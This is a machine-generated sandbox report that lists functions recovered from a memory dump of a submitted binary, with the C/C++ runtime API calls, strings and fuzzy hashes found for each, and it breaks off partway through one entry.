Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19

Function 00439A79 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AC1
_free.LIBCMT ref: 00439AE5
_free.LIBCMT ref: 00439AF2
_free.LIBCMT ref: 00439B17
_free.LIBCMT ref: 00439B24
_free.LIBCMT ref: 00439B2D
_free.LIBCMT ref: 00439E0B
_free.LIBCMT ref: 00439E13

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54

Function 0042483D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856

Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424888
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042494C

Strings

switchState, xrefs: 00424872
pContext, xrefs: 00424936

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798

Function 00419736 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
DuplicateHandle.KERNEL32(00000000), ref: 00419769
SafeRWList.LIBCONCRT ref: 00419788

Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
Part of subcall function 00417757: List.LIBCMT ref: 00417772

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
GetLastError.KERNEL32 ref: 004197A9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197CD

Strings

eventObject, xrefs: 00419792

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D

Function 00431DD6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DEA

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 00431DF6
_free.LIBCMT ref: 00431E01
_free.LIBCMT ref: 00431E0C
_free.LIBCMT ref: 00431E17
_free.LIBCMT ref: 00431E22
_free.LIBCMT ref: 00431E2D
_free.LIBCMT ref: 00431E38
_free.LIBCMT ref: 00431E43
_free.LIBCMT ref: 00431E51

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88

Function 0042E1A2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1CE
__cftoe.LIBCMT ref: 0042E200

Strings

<(@, xrefs: 0042E219, 0042E1B0
<(@, xrefs: 0042E24E, 0042E1BC, 0042E251

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __cftoe
String ID: <(@$<(@
API String ID: 4189289331-1745028333
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D

Function 0043EE92 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5

Strings

pow, xrefs: 0043EF99, 0043F045, 0043F058
asin, xrefs: 0043F021
exp, xrefs: 0043EF7A, 0043EFDC
sqrt, xrefs: 0043F039
acos, xrefs: 0043F02D
log10, xrefs: 0043EEFF, 0043EF4F
log, xrefs: 0043EF5B, 0043EF67

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E

Function 00428CAD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
PMDtoOffset.LIBCMT ref: 00428D3F

Strings

Bad dynamic_cast!, xrefs: 00428D81

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9

Function 00405564 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00405575
int.LIBCPMT ref: 0040558C

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00405595
std::_Facet_Register.LIBCPMT ref: 004055C6
std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
__CxxThrowException@8.LIBVCRUNTIME ref: 004055FA

Strings

pNj, xrefs: 00405583, 004055D3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: pNj
API String ID: 2243866535-1747803023
Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C

Function 00404C0A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
int.LIBCPMT ref: 00404C32

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 00404C3B
std::_Facet_Register.LIBCPMT ref: 00404C6C
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0

Strings

0qs, xrefs: 00404C29, 00404C79

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: 0qs
API String ID: 2243866535-604132531
Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C

Function 00432124 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
__alloca_probe_16.LIBCMT ref: 004321B6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
__alloca_probe_16.LIBCMT ref: 0043229B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
__freea.LIBCMT ref: 0043230B

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

__freea.LIBCMT ref: 00432314
__freea.LIBCMT ref: 00432339

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668

Function 00439E9E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F0D
_free.LIBCMT ref: 00439F1B
_free.LIBCMT ref: 0043A049
_free.LIBCMT ref: 0043A054

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59

Function 00433873 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
__fassign.LIBCMT ref: 00433930
__fassign.LIBCMT ref: 0043394B
WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69

Function 004286C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286EB
___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
_ValidateLocalCookies.LIBCMT ref: 00428781
__IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
_ValidateLocalCookies.LIBCMT ref: 00428801

Strings

csm, xrefs: 00428796

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99

Function 0043F931 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9

Function 0043A373 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3

_free.LIBCMT ref: 0043A3C1

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043A3CC
_free.LIBCMT ref: 0043A3D7
_free.LIBCMT ref: 0043A42B
_free.LIBCMT ref: 0043A436
_free.LIBCMT ref: 0043A441
_free.LIBCMT ref: 0043A44C

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47

Function 00431F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
_free.LIBCMT ref: 00431F88
_free.LIBCMT ref: 00431FAF
SetLastError.KERNEL32(00000000), ref: 00431FBC
SetLastError.KERNEL32(00000000), ref: 00431FC5

Strings

]p, xrefs: 00431FA3

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLast$_free
String ID: ]p
API String ID: 3170660625-3139552953
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: e50af596af166b8a3d4a0e4732677f958598b7c5f443a1734cc3cd8306247ad3
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: F7014936609A003BD3122B315C45D2B266DABD977AF21212FF805933E2EB2C8902512D

Function 004123E2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
__CxxThrowException@8.LIBVCRUNTIME ref: 00412463

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D

Function 00431ECA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
_free.LIBCMT ref: 00431F01
_free.LIBCMT ref: 00431F29
SetLastError.KERNEL32(00000000), ref: 00431F36
SetLastError.KERNEL32(00000000), ref: 00431F42

Strings

]p, xrefs: 00431F1C

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLast$_free
String ID: ]p
API String ID: 3170660625-3139552953
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D

Function 0040C60E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D

Strings

ios_base::badbit set, xrefs: 0040C630, 0040C650
<(@, xrefs: 0040C611
ios_base::eofbit set, xrefs: 0040C63F
<(@, xrefs: 0040C647
ios_base::failbit set, xrefs: 0040C63A

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Exception@8Throw
String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-859722693
Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C

Function 00430EB2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

_memcmp.LIBVCRUNTIME ref: 0043115C
_free.LIBCMT ref: 004311CD
_free.LIBCMT ref: 004311E6
_free.LIBCMT ref: 00431218
_free.LIBCMT ref: 00431221
_free.LIBCMT ref: 0043122D

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44

Function 00428DCA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,D29BB238), ref: 00428DD8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,D29BB238), ref: 00428E51

Memory Dump Source

Source File: 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D

Function 00404D48 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

